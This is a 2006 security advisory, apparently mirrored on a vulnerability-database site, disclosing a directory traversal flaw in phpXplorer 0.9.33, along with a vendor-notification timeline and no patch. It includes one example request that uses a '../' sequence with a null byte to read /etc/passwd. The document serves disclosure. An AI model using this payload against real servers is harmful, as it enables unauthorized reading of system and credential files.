Lucene search
adv20060116.txt
🗓️ 21 Jan 2006 00:00:00Reported by Oriol Torrent SantiagoType 
packetstorm🔗 packetstormsecurity.com👁 22 Views
Directory traversal in phpXplorer allows attackers to read arbitrary files outside web roo
Show more
`==========================================================
Title: Directory traversal in phpXplorer
Application: phpXplorer
Vendor: http://www.phpxplorer.org
Vulnerable Versions: 0.9.33
Bug: directory traversal
Date: 16-January-2006
Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com >
References:
http://www.arrelnet.com/advisories/adv20060116.html
==========================================================
1) Background
-----------
phpXplorer is an open source file management system written in PHP.
It enables you to work on a remote file system through a web browser.
2) Problem description
--------------------
An attacker can read arbitrary files outside the web root by sending
specially formed requests
Ex:
http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1
3) Solution:
----------
No Patch available.
4) Timeline
---------
17/12/2005 Bug discovered
20/12/2005 Vendor receives detailed advisory. No response
04/01/2006 Second notification. No response
16/01/2006 Public Disclosure
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo21 Jan 2006 00:00Current
7.4High risk
Vulners AI Score7.4